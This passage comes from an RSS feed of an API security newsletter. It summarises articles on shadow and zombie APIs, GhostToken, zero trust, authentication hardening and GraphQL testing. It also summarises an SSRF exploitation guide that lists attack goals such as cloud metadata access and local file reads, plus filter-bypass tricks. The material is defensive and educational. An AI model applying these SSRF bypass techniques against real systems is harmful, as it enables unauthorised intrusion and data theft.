<li style="font-weight: 400;" aria-level="1"><b>Keep an Active Inventory of APIs:</b><span style="font-weight: 400;"> The first article already stressed the importance of keeping an up-to-date inventory, which is critical for addressing zombie APIs. Ensure that your infrastructure is scanned for the presence of APIs and that all instances are tracked and accounted for in an inventory that is reviewed frequently for deprecated instances.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Use Proper Versioning and Life Cycle Strategies:</b><span style="font-weight: 400;"> By ensuring the APIs are versioned, organizations can proactively manage the lifecycle of APIs and gracefully retire older versions rather than leaving them active but unmanaged. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Share Knowledge of Internal and Third-Party Services:</b><span style="font-weight: 400;"> The most obvious way to avoid zombie APIs is by injecting governance into the development process and ensuring that teams and product owners have visibility into the APIs available in the organization. Typically, this can be achieved by using an API developer portal, or API management platform, or even a set of Posman collections.</span></li>
</ul>
<p><span style="font-weight: 400;">Unfortunately, this is not an easy problem to address and is only likely to become more of a concern as the number of APIs (and the versions thereof) continues to grow.</span></p>
<h2><span style="font-weight: 400;">Article: The danger of shadow APIs</span></h2>
<p><span style="font-weight: 400;">In the second article on the challenges relating to API inventory, </span><a href="https://thehackernews.com/2023/04/why-shadow-apis-are-more-dangerous-than.html" target="_blank" rel="noopener"><span style="font-weight: 400;">we have an article</span></a><span style="font-weight: 400;"> from The Hacker News on the danger of shadow APIs. Shadow APIs are often conflated with zombie APIs, but their origin differs greatly. Shadow APIs are considered to be APIs that have been published via a non-standard process on non-standard (and, of course, non-governed or managed) infrastructure. Typically, this occurs when a business unit needs to release a new product or feature and does not have time to navigate the formal process and uses covert means to deploy an API (the canonical example is to use a credit card to purchase cloud compute resources and deploy directly there outside of the standard IT systems). </span></p>
<p><span style="font-weight: 400;">Shadow APIs are plagued by many of the same security challenges associated with zombie APIs, but in many ways, the threat is even more significant. These APIs may have access to internal APIs exposing sensitive data or may simply store this data locally in a totally ungoverned manner. Zombie APIs pose significant governance and compliance challenges.</span></p>
<p><span style="font-weight: 400;">The biggest challenge associated with shadow APIs is that while zombie APIs can be discovered by IT security teams, it is significantly harder to find shadow APIs that might be on entirely separate IP address ranges and not even hosted on corporately approved cloud platforms. </span></p>
<p><span style="font-weight: 400;">The recommendation is a mixture of carrot and stick. First, ensure that your corporate IT security and governance are not so strict that it inhibits legitimate business activities, forcing product teams to go underground. However, ensure that your IT security teams are monitoring for any indicators of shadow IT to eliminate unnecessary risk and exposure. </span></p>
<h2><span style="font-weight: 400;">Guide: Exploiting SSRF in an API</span></h2>
<p><span style="font-weight: 400;">In the first of two guides from Dana Epp this week, </span><a href="https://danaepp.com/exploiting-ssrf-in-an-api" target="_blank" rel="noopener"><span style="font-weight: 400;">he takes a deep dive</span></a><span style="font-weight: 400;"> into exploiting Server Side Request Forgery (SSRF) vulnerabilities. While this vulnerability (and its counterpart Cross Site Request Forgery (CSRF)) has existed for decades, it has only recently been included in the OWASP API Security Top 10 as </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa7-server-side-request-forgery/" target="_blank" rel="noopener"><span style="font-weight: 400;">API7:2023 Server Side Request Forgery</span></a><span style="font-weight: 400;">. </span></p>
<p><span style="font-weight: 400;">Conceptually speaking, SSRF vulnerability is really simple to understand. An attacker can make a request to a vulnerable server and trick that server into making a request to a third-party server under the control of the attacker. Typically, this is done by forging or manipulating request parameters that cause the server to redirect to a server outside of its remit.  </span></p>
<p><span style="font-weight: 400;"> As usual, Dana’s focus is on the offensive side of the vulnerability, and in this guide, you will learn everything you need to be able to exploit CSRF vulnerabilities. The first step is to find an endpoint that may be vulnerable, and for this, he suggests the following tips:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Check if the API uses any of a common list of common vulnerable parameter names such as </span><i><span style="font-weight: 400;">uri, path, callback.</span></i></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Check if the API accepts a webhook (since this is vulnerable to accepting a forged target).</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Check if the AP imports files (since the path can likely be manipulated to load a different resource).</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">If the server generates a PDF file, then it’s possible that the attacker can embed resources into the file and launch a file-based XSS attack.</span></li>
</ul>
<p><span style="font-weight: 400;">Once you have found a potentially vulnerable API, there are several types of attacks that you can mount against the endpoint, namely:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Local/Remote port scanning</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Local file read</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Interacting with internal services</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Interacting with internal services</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Accessing cloud metadata</span></li>
</ul>
<p><span style="font-weight: 400;">Finally, Dana outlines common methods to evade SSRF protections, such as:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Use exotic URL schemas</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Using hostname instead of IP</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Non-standard IP notation</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Open redirects</span></li>
</ul>
<p><span style="font-weight: 400;">Note that many of the bypasses rely on being able to trick the logic of a </span><i><span style="font-weight: 400;">block list</span></i><span style="font-weight: 400;">, which highlights the futility of attempting to block known bad. Use an </span><i><span style="font-weight: 400;">allow list </span></i><span style="font-weight: 400;">to explicitly pass redirections according to an approved list. </span></p>
<p><span style="font-weight: 400;">A great article from Dana and a reminder never to let him near your computer network <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></span></p>
<h2><span style="font-weight: 400;">Guide: Grepping API payloads with Gron</span></h2>
<p><span style="font-weight: 400;">Finally, in this marathon edition, </span><a href="https://danaepp.com/grepping-through-api-payloads-with-gron" target="_blank" rel="noopener"><span style="font-weight: 400;">we have another guide from Dana Epp</span></a><span style="font-weight: 400;"> on using the </span><i><span style="font-weight: 400;">gron</span></i><span style="font-weight: 400;"> tool to parse and process JSON payloads at speed and scale. </span></p>
<p><span style="font-weight: 400;">The easiest way to understand what gron does is to think of it as what grep does for text but for JSON data. Executing </span><i><span style="font-weight: 400;">gron</span></i><span style="font-weight: 400;"> against a JSON file gives an output as shown below:</span></p>
<pre class="line-numbers"><code class="language-json">colind@mbm1air: ~ # gron file.json
json = {};
json.bpi = {};
json.bpi.EUR = {};
json.bpi.EUR.code = "EUR";
json.bpi.EUR.description = "Euro";
json.bpi.EUR.rate = "25,154.3878";
json.bpi.EUR.rate_float = 25154.3878;
json.bpi.EUR.symbol = "€";
json.bpi.GBP = {};
json.bpi.GBP.code = "GBP";
json.bpi.GBP.description = "British Pound Sterling";
json.bpi.GBP.rate = "21,576.6478";
json.bpi.GBP.rate_float = 21576.6478;
json.bpi.GBP.symbol = "£";</code></pre>
<p><span style="font-weight: 400;">Now that the file has been flattened, you can apply the stand </span><i><span style="font-weight: 400;">grep, sed, awk</span></i><span style="font-weight: 400;"> techniques to extract data. For instance, to get the Euro rate, execute the following command on the flattened data:</span></p>
<pre class="line-numbers"><code class="language-json">gron file.json | grep EUR.rate_float | cut -d ' ' -f 3 | tr -d ';'
25154.3878</code></pre>
<p><span style="font-weight: 400;">Thanks again to Dana for bringing us the best in offensive tooling and techniques.</span></p>
<p>The post <a href="https://apisecurity.io/issue-228-3rd-party-api-security-oauth2-step-up-deep-dive-shadow-and-zombie-apis/">Issue 228: 3rd party API security, OAuth2 step-up deep-dive, shadow and zombie APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 227: GhostToken on Google Cloud, Gartner on zero trust, API authentication</title>
		<link>https://apisecurity.io/issue-227-ghosttoken-on-google-cloud-gartner-on-zero-trust-api-authentication/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 25 Aug 2023 13:15:25 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10866</guid>

					<description><![CDATA[<p>This week, we have news of the so-called “GhostToken” vulnerability affecting Google Cloud. We also have articles from Gartner on a report on zero trust not being a silver bullet, how authentication attacks threaten API security, and finally, why API security is everywhere except where you need it. Vulnerability: GhostToken vulnerability in Google Cloud This [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-227-ghosttoken-on-google-cloud-gartner-on-zero-trust-api-authentication/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-227-ghosttoken-on-google-cloud-gartner-on-zero-trust-api-authentication/">Issue 227: GhostToken on Google Cloud, Gartner on zero trust, API authentication</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of the so-called “GhostToken” vulnerability affecting Google Cloud. We also have articles from Gartner on a report on zero trust not being a silver bullet, how authentication attacks threaten API security, and finally, why API security is everywhere except where you need it.</p>
<h2><span style="font-weight: 400;">Vulnerability: GhostToken vulnerability in Google Cloud</span></h2>
<p><span style="font-weight: 400;">This week, </span><a href="https://latesthackingnews.com/2023/04/24/ghosttoken-zero-day-vulnerability-found-in-google-cloud/" target="_blank" rel="noopener"><span style="font-weight: 400;">we have news of the so-called GhostToken vulnerability</span></a><span style="font-weight: 400;">, which could allow attackers to target Google Cloud users via the application marketplace. According to</span><a href="https://astrix.security/ghosttoken-exploiting-gcp-application-infrastructure-to-create-invisible-unremovable-trojan-app-on-google-accounts/" target="_blank" rel="noopener"><span style="font-weight: 400;"> the researchers at Astrix</span></a><span style="font-weight: 400;"> who discovered the vulnerability, it could have allowed attackers to access the target account’s Google Drive, Calendar, Photos, Google Docs, Google Maps, and other Google Cloud Platform services. The researchers reported their findings to Google in June 2022, Google accepted them in August 2022, and in April 2023, they released a global patch to address the issue. Researchers also recommended that Google Cloud users regularly verify the application installed on their instance using the application management page on the Google Cloud portal.</span></p>
<p><span style="font-weight: 400;">The root cause of the vulnerability relates to the manner in which Google Cloud manages the lifecycle of an application and, specifically, how the application’s associated OAuth2 tokens are managed. The Google Cloud provides a 30-day grace period from the time an application is scheduled for deletion until the time it is permanently deleted. This grace period is to allow administrators an opportunity to recover resources deleted in error. While in the </span><i><span style="font-weight: 400;">pending deletion</span></i><span style="font-weight: 400;"> state, the application (and its associated resources such as OAuth2 tokens) are invisible to platform users. The researchers at Astrix discovered that if an application’s pending deletion was canceled within the 30-day window, then the application and all its associated resources would be restored. They tested this with an OAuth2 token and discovered that this token still provided access to its original resources. </span></p>
<p><span style="font-weight: 400;">They describe how this delete/pending deletion/cancel deletion loop can be used to effectively hide a rogue application from the application management page of a user’s Google Cloud portal, using the following attack flow:</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10867" src="https://apisecurity.io/wp-content/uploads/2023/08/Article1.jpg" alt="" width="600" height="456" srcset="https://apisecurity.io/wp-content/uploads/2023/08/Article1.jpg 726w, https://apisecurity.io/wp-content/uploads/2023/08/Article1-300x228.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p>Using this technique, an attacker could effectively hide their application in perpetuity except for a short window every 30 days where they executed the restore / delete step. This would make it almost impossible for an attacker to detect the presence of a malicious application.</p>
<p>A timely reminder for administrators to regularly check for unused or unexpected access tokens on their platforms.</p>
<h2><span style="font-weight: 400;">Article: Gartner’s views on zero trust</span></h2>
<p><span style="font-weight: 400;">Next up, </span><a href="https://venturebeat.com/security/gartner-zero-trust-isnt-a-silver-bullet/" target="_blank" rel="noopener"><span style="font-weight: 400;">we have views from Gartner</span></a><span style="font-weight: 400;"> and other industry experts on the promises of zero trust, particularly its impact on API security. The article featured in Venture Beat </span><a href="https://www.gartner.com/en/newsroom/press-releases/2023-01-23-gartner-predicts-10-percent-of-large-enterprises-will-have-a-mature-and-measurable-zero-trust-program-in-place-by-2026" target="_blank" rel="noopener"><span style="font-weight: 400;">cites findings from recent Gartner research</span></a><span style="font-weight: 400;">, which indicates that while 97% of organizations have a zero trust initiative, only 10% of them will have a measurable program in place by 2026. While zero trust offers great promise to reducing overall cyber risk, the report is a timely reminder that it is not a silver bullet or simple cure-all, particularly with respect to API security.</span></p>
<p><span style="font-weight: 400;">According to Gartner, the greatest challenge with zero trust is that it is primarily an access control, which proves ineffective in protection attacks targeting other layers of the modern application surface. In particular, scaling zero trust to protect APIs is challenging, contributing to the scale of API breaches seen throughout 2023, including the T-Mobile and Twitter breaches (featured </span><a href="https://apisecurity.io/issue-224-api-security-is-critical-in-2023-api-contract-testing-and-fencer-security-testing-tool/" target="_blank" rel="noopener"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;"> and </span><a href="https://apisecurity.io/issue-217-wordle-api-exposes-answers-twitter-api-breach-updates-aws-exposed-dangerous-api/" target="_blank" rel="noopener"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;"> in this newsletter). </span></p>
<p><span style="font-weight: 400;">The article highlights interesting differences in views between industry leaders on how best to protect APIs. For Forrester, organizations should move away from protecting APIs with traditional perimeter-based security approaches and embedding security into the API development lifecycle (certainly a view I share). However, others differ in opinion — Ted Miracco (CEO of Approov) suggests that this shift-left approach to API security fails to address the real-world challenges to API security, citing the fact that many breaches have occurred against APIs that were perfectly well authenticated. His approach is to ensure that APIs are continuously monitored against threats in real-time. </span></p>
<p><span style="font-weight: 400;">The report concludes that zero trust is an effective risk reduction control, but that additional controls (specifically continuous monitoring) are necessary for hardening the API security posture. For me, the best approach remains the shift-left and shield-right approach.</span></p>
<h2><span style="font-weight: 400;">Article: Authentication attacks threaten API security </span></h2>
<p><span style="font-weight: 400;">In the </span><a href="https://www.infosecurity-magazine.com/next-gen-infosec/broken-authentication-attacks-api/" target="_blank" rel="noopener"><span style="font-weight: 400;">next article from Infosecurity Magazine</span></a><span style="font-weight: 400;">, we take a deeper look at why authentication attacks threaten API security. Certainly, </span><a href="https://apisecurity.io/owasp-api-security-top-10/api1-broken-object-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">according to OWASP</span></a><span style="font-weight: 400;">, broken authentication remains a significant challenge to API security in 2023. </span></p>
<p><span style="font-weight: 400;">There are a number of reasons contributing to poor API authentication, both on the API implementation and the client side. In the case of the implementation, this can range from simple flaws, such as forgetting to implement the authentication check in the code, to incorrectly handling and processing a JWT token (forgetting to verify the signature, for example). On this client side, authentication can be weakened by the use of weak passwords, or by insecure handling of tokens and keys.</span></p>
<p><span style="font-weight: 400;">There are a number of recommendations that can be implemented to harden API authentication, including:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Generate complex passwords and keys:</b><span style="font-weight: 400;"> Enforce a password policy requiring a minimum length and complexity, and ensure that keys are sufficiently long and not predictable.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Protect your password reset process:</b><span style="font-weight: 400;"> A common vector used by attackers is to brute force the password reset process. Enforce rate limiting or other out-of-band challenges on the password reset endpoints to thwart attempts to brute force them.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Generate tokens correctly:</b><span style="font-weight: 400;"> JWT tokens are frequently generated incorrectly, including omitting a signature, or expiration date.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Enforce token expiration:</b><span style="font-weight: 400;"> Ensure that tokens and keys have an expiration date and do not persist forever to minimize the impact of a lost or stolen token.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Protect against token and key leakage:</b><span style="font-weight: 400;"> Use a password manager or vault to store keys so that they cannot be accessed by third parties.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Enforce step-up authentication:</b><span style="font-weight: 400;"> When accessing sensitive endpoints, enforce an additional layer of security, such as using MFA or additional challenges.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Ensure a robust revocation process exists:</b><span style="font-weight: 400;"> In the event of a compromise, ensure that you have a robust process to be able to revoke and then re-issue the affected keys or tokens.</span></li>
</ul>
<p><span style="font-weight: 400;">Authentication is one of the most important API security vulnerabilities, but fortunately, one of the easier ones to mitigate by following relatively simple best practices.</span></p>
<h2><span style="font-weight: 400;">Article: API security is everywhere, except where you need it</span></h2>
<p><span style="font-weight: 400;">The </span><a href="https://securityboulevard.com/2023/02/why-api-security-is-everywhere-except-where-you-need-it/" target="_blank" rel="noopener"><span style="font-weight: 400;">final article this week</span></a><span style="font-weight: 400;"> comes from Security Boulevard and features the thoughts of Josh Thorngren on why API security is everywhere except where you need it. </span></p>
<p><span style="font-weight: 400;">The author believes API security is a broad topic but poorly defined, which tends to confuse the user when selecting an appropriate solution. For example, API security can range from using SAST tools for testing API code (I’ve </span><a href="https://apisecurity.io/issue-152-exposed-api-keys-tokens-sast-dast-api-security-testing-value-api-specifications/" target="_blank" rel="noopener"><span style="font-weight: 400;">previously discussed this approach</span></a><span style="font-weight: 400;"> and its shortcomings) to attempting to use network firewalls to protect APIs at runtime. Yet other vendors focus on the importance of managing your inventory as a route to reducing API security risk.</span></p>
<p><span style="font-weight: 400;">The author describes the approach taken by Mayhem, which automatically generates and executes attacks against your APIs (in a similar fashion to the </span><a href="https://42crunch.com/api-conformance-scan/" target="_blank" rel="noopener"><span style="font-weight: 400;">42Crunch API conformance scan</span></a><span style="font-weight: 400;">). The advantage of performing this type of extensive testing before reaching production is to identify any vulnerabilities, weaknesses, and data leaks in your APIs. Additionally, this testing can identify performance and reliability concerns, as well as other anomalous. </span></p>
<p><span style="font-weight: 400;">The article concludes with some tips to improve API security including:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Ensure that your authentication and authorization implementation is well designed and robustly implemented.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Monitor API usage regularly and keep up-to-date on vulnerabilities.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Use input validation to prevent attackers from being able to abuse your APIs against their design intent.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Be proactive about API security right at design time, and understand the risks in the event of compromise.</span></li>
</ul>
<h2><span style="font-weight: 400;">Article: Why most API Security solutions have not delivered on the hype</span></h2>
<p><span style="font-weight: 400;">Finally, this week, </span><a href="https://42crunch.com/why-most-api-security-solutions-have-not-delivered-on-the-hype/" target="_blank" rel="noopener"><span style="font-weight: 400;">we feature the thoughts</span></a><span style="font-weight: 400;"> of my colleague Tom Chang on why API security solutions have not delivered on the hype. </span></p>
<p><a href="https://42crunch.com/why-most-api-security-solutions-have-not-delivered-on-the-hype/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10863" src="https://apisecurity.io/wp-content/uploads/2023/08/Blog-Why-Most-API-Security-Solutions-have-not-delivered-on-the-hype.png" alt="" width="597" height="341" srcset="https://apisecurity.io/wp-content/uploads/2023/08/Blog-Why-Most-API-Security-Solutions-have-not-delivered-on-the-hype.png 1007w, https://apisecurity.io/wp-content/uploads/2023/08/Blog-Why-Most-API-Security-Solutions-have-not-delivered-on-the-hype-300x171.png 300w, https://apisecurity.io/wp-content/uploads/2023/08/Blog-Why-Most-API-Security-Solutions-have-not-delivered-on-the-hype-768x439.png 768w" sizes="auto, (max-width: 597px) 100vw, 597px" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-227-ghosttoken-on-google-cloud-gartner-on-zero-trust-api-authentication/">Issue 227: GhostToken on Google Cloud, Gartner on zero trust, API authentication</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 226 : Jetpack WordPress plugin has API vulnerability, how to address API security in 2023</title>
		<link>https://apisecurity.io/issue-226-jetpack-wordpress-plugin-has-api-vulnerability-how-to-address-api-security-in-2023/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 10 Aug 2023 17:47:42 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10828</guid>

					<description><![CDATA[<p>This week, we have news of an API vulnerability in the popular Jetpack WordPress plugin affecting millions of websites, an article on how to address growing API security vulnerabilities in 2023, and an article on why API security is the need of the hour. Finally, we have a guide from Port Swigger on how to [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-226-jetpack-wordpress-plugin-has-api-vulnerability-how-to-address-api-security-in-2023/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-226-jetpack-wordpress-plugin-has-api-vulnerability-how-to-address-api-security-in-2023/">Issue 226 : Jetpack WordPress plugin has API vulnerability, how to address API security in 2023</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of an API vulnerability in the popular Jetpack WordPress plugin affecting millions of websites, an article on how to address growing API security vulnerabilities in 2023, and an article on why API security is the need of the hour. Finally, we have a guide from Port Swigger on how to use Burp Suite to discover GraphQL vulnerabilities.</p>
<h2>Vulnerability: Jetpack WordPress plug-in API vulnerability affects millions of websites</h2>
<p>The popular WordPress plugin Jetpack <a href="https://www.darkreading.com/endpoint/jetpack-wordpress-plugin-api-bug-mass-updates" target="_blank" rel="noopener">forced an update to all installations</a> to address a critical API vulnerability in their plugin. The plugin is extremely popular with WordPress users and has over 5 million downloads globally. This vulnerability has existed in all versions since the original 2.0 release in 2012.</p>
<p>There is scant detail regarding the nature of the vulnerability in the<a href="https://jetpack.com/blog/jetpack-12-1-1-critical-security-update/" target="_blank" rel="noopener"> official announcement from Jetpack</a>, except that if affects an API and could allow access to the filesystem of affected hosts. The article lists all the affected versions but insists that no known exploits of the vulnerability exist.</p>
<p>Users are asked to ensure that they are using the most current plugin version, Jetpack 12.1.1.</p>
<h2>Article: How to address growing API security vulnerabilities in 2023</h2>
<p>In the first of two articles addressing API security challenges this week, <a href="https://www.itsecurityguru.org/2023/02/24/how-to-address-growing-api-security-vulnerabilities-in-2023/" target="_blank" rel="noopener">we have Katrina Thompson&#8217;s thoughts</a>, writing in IT Security Guru. The author highlights the importance of APIs in building today&#8217;s digital infrastructure. Unfortunately, this increases the risk of attackers who realize that APIs represent the &#8220;sweet spot&#8221; when attacking an organization. According to the article &#8220;<cite>a recent study indicated that 97% of enterprise leaders classify API use as essential to future growth, and another shows the average number of APIs used grew 82% over last year.&#8221;</cite></p>
<p>The author identifies five types of API security vulnerability and suggests how to deal with them, as follows:</p>
<ul>
<li><strong>Overly permissive APIs:</strong> APIs frequently have access to more data than they should and often execute at a higher privilege than they ought to. APIs should be granted the least privilege required to perform their business objective and no more.</li>
<li><strong>Faults in the code:</strong> As our readers are aware, many API vulnerabilities are due to flaws in the code base, leading to vulnerabilities such as BOLA, BFLA, and broken authentication. Always make sure API code bases are scanned for vulnerabilities and reviewed manually on any major changes.</li>
<li><strong>Speed over security:</strong> Coupled with the topic of faults in API code is the topic of favoring speed over security. In many cases, the business needs tend to dominate, and the API team publishes APIs before they have been fully validated for security. This results in costly outages in production, including expensive hotfixes and reworks. Addressing security in the early stages of development is far more effective.</li>
<li><strong>Exposed (and hidden) APIs</strong>: Readers of the newsletter will be familiar with the problems caused for security teams by shadow and zombie APIs. It is impossible to secure if you do not know what APIs you own and operate.</li>
<li><strong>Every API is unique:</strong> Ensure you understand the specific needs of securing each of your APIs, as they may have very different characteristics and security requirements.</li>
</ul>
<p>A quick read on some of the basic issues facing API security in 2023.</p>
<h2>Article: API security is the need of the hour</h2>
<p>The next article <a href="https://cio.economictimes.indiatimes.com/news/digital-security/api-security-the-need-of-the-hour/99228424" target="_blank" rel="noopener">features the thoughts of various security luminaries in India</a> featured in CIO.com and Indiatimes.com.</p>
<p>Nikhil Chawla, Head &#8211; Global Information Security &amp; Cyber Security at Colgate-Palmolive believes that people and threats cause many challenges to API security. In many cases, developers are not fully aligned with the threats that can be created for their APIs by neglecting important topics such as rate-limiting, DDoS attacks, and cross-site scripting attacks. By understanding these better, they are likely to have better success in protecting their APIs.</p>
<p>Babitha B P, CISO at The CSB Bank Ltd. focused on the important topic of API visibility. The key to securing APIs at scale is to ensure that they are monitored in an automated fashion and that there is minimal reliance on manual discovery and audit of APIs.</p>
<p>Navneet Daga, Sales Director of Cloud Security Services at Radware concludes by stressing that improved API security requires greater collaboration between security and development teams and that API security is not a point solution but rather requires a layered strategy for defense in depth.</p>
<h2>Guide: Using Burp Suite to find GraphQL vulnerabilities</h2>
<p>Recently, we have had a lot of great coverage on GraphQL security, and this week, Port Swigger <a href="https://portswigger.net/web-security/graphql" target="_blank" rel="noopener">provides an excellent walkthrough</a> on using their Burp Suite tool to identify GraphQL vulnerabilities.</p>
<p>The first step in exploiting a GraphQL API is to discover the endpoints. This can be done manually with Burp Suite or by sending a universal query to common GrahpQL API endpoints such as the following:<br />
<code>/graphql<br />
/api<br />
/api/graphql<br />
/graphql/api<br />
/graphql/graphql</code></p>
<p>Once the endpoint has been identified, you can identify the different request methods supported by the endpoint, including the supported data types.</p>
<p>The next step is to identify unsanitized arguments and discover different ways to inject malicious content via these arguments. Discovering schema information offers insight into the structure of the API, and allows an attacker to gain insight into how to attack the API further. Burp Suite also offers an extension that automates much of this discovery process, this is the popular <code>InQL</code> extension.</p>
<p>InQL is a Burp Suite extension that helps you to audit GraphQL APIs securely. It issues an introspection query requesting all queries and mutations given a URL (either via links to live endpoints or via JSON files) and presents a structured view to help you explore the results.</p>
<p>From a security perspective, the article concludes with some useful advice for defending GraphQL APIs, namely:</p>
<ul>
<li>Disable introspection on the API endpoint unless there is an explicit and well-understood reason to enable it. This prevents an attacker from understanding the workings of the endpoint.</li>
<li>Review the API&#8217;s schema to ensure it does not expose unintended fields to the public.</li>
<li>Ensure that suggestions are disabled to prevent attackers from being able to use tools to glean information about the underlying schema.</li>
<li>Ensure that your API&#8217;s schema does not expose private user fields, such as PII or similar information.</li>
</ul>
<p>GraphQL is a complex topic for API security and guides such as this are always welcomed by our readers &#8211; thanks to Port Swigger.</p>
<p>The post <a href="https://apisecurity.io/issue-226-jetpack-wordpress-plugin-has-api-vulnerability-how-to-address-api-security-in-2023/">Issue 226 : Jetpack WordPress plugin has API vulnerability, how to address API security in 2023</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 225 : API security needs a reset, vAPI walkthrough, five stages to attain API security</title>
		<link>https://apisecurity.io/issue-225-api-security-needs-a-reset-vapi-walkthrough-five-stages-to-attain-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 26 Jul 2023 16:28:22 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10802</guid>

					<description><![CDATA[<p>This week, we have views from Matias Madou (CTO of Secure Code Warrior) on why API security needs a reset to focus on people and not tools, another excellent walkthrough of the vAPI vulnerable API, an article covering the five stages necessary to attain API security, and a quick guide on exploiting GraphQL endpoints. Article: [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-225-api-security-needs-a-reset-vapi-walkthrough-five-stages-to-attain-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-225-api-security-needs-a-reset-vapi-walkthrough-five-stages-to-attain-api-security/">Issue 225 : API security needs a reset, vAPI walkthrough, five stages to attain API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have views from Matias Madou (CTO of Secure Code Warrior) on why API security needs a reset to focus on people and not tools, another excellent walkthrough of the vAPI vulnerable API, an article covering the five stages necessary to attain API security, and a quick guide on exploiting GraphQL endpoints.</p>
<h2>Article: API security needs a reset</h2>
<p>We have <a href="https://apisecurity.io/issue-220-api-flaw-in-booking-com-apps-leaking-sensitive-api-data-api-security-testing-checklist/" target="_blank" rel="noopener">previously featured</a> views on API security from Matias Madou (CTO of Secure Code Warrior) in this newsletter, and this week <a href="https://techbeacon.com/security/api-security-needs-reset-people-not-tools" target="_blank" rel="noopener">we feature a longer thought leadership piece</a> courtesy of Techbeacon. In this article, Matias describes how many organizations struggle to scale their API security initiatives due to a surplus of security testing tools (the industry average is currently 76 tools). His underlying viewpoint is that the focus is predominantly on the tools rather than addressing the root causes of insecure APIs, namely, the developers building the APIs. He reiterates my own view that most data breaches are caused by human error.</p>
<p>Matias makes a case for a reset in our approach, moving away from a focus on tools and embracing broader best practices such as:</p>
<ul>
<li><strong>Assigning API ownership:</strong> APIs tend to be over-permissioned and overshare information (consider how prevalent <a href="https://apisecurity.io/owasp-api-security-top-10/api3-excessive-data-exposure/" target="_blank" rel="noopener">API 03:2019 — Excessive data exposure</a> is in this newsletter). This tendency to over-communicate arises because APIs seldom have dedicated owners; the API evolves in an ad-hoc manner and tends to become overly verbose. Keep the focus on what the API should do for the business; do only that and no more.</li>
<li><strong>Treating APIs like humans:</strong> Just as we do with people in sensitive roles, we should apply the principles of least privilege, role-based authorization, and zero-trust to APIs.</li>
<li><strong>Incorporating a test-first mentality:</strong> Testing is frequently left too late, and this is particularly the case with APIs. Ensure your developers are testing as they code and embed those test fixtures into the entire SDLC.</li>
<li><strong>Including scenario simulations:</strong> Conducting simulations of various API situations can help development teams anticipate how their APIs may be abused or misbehave in a real-world situation.</li>
<li><strong>Changing performance-review metrics:</strong> All too frequently, developers are incentivized on the speed of delivery at the expense of almost everything else. Consider changing how you assess your developers, give them time to absorb security learning, and adjust their performance review metrics to reflect this focus.</li>
</ul>
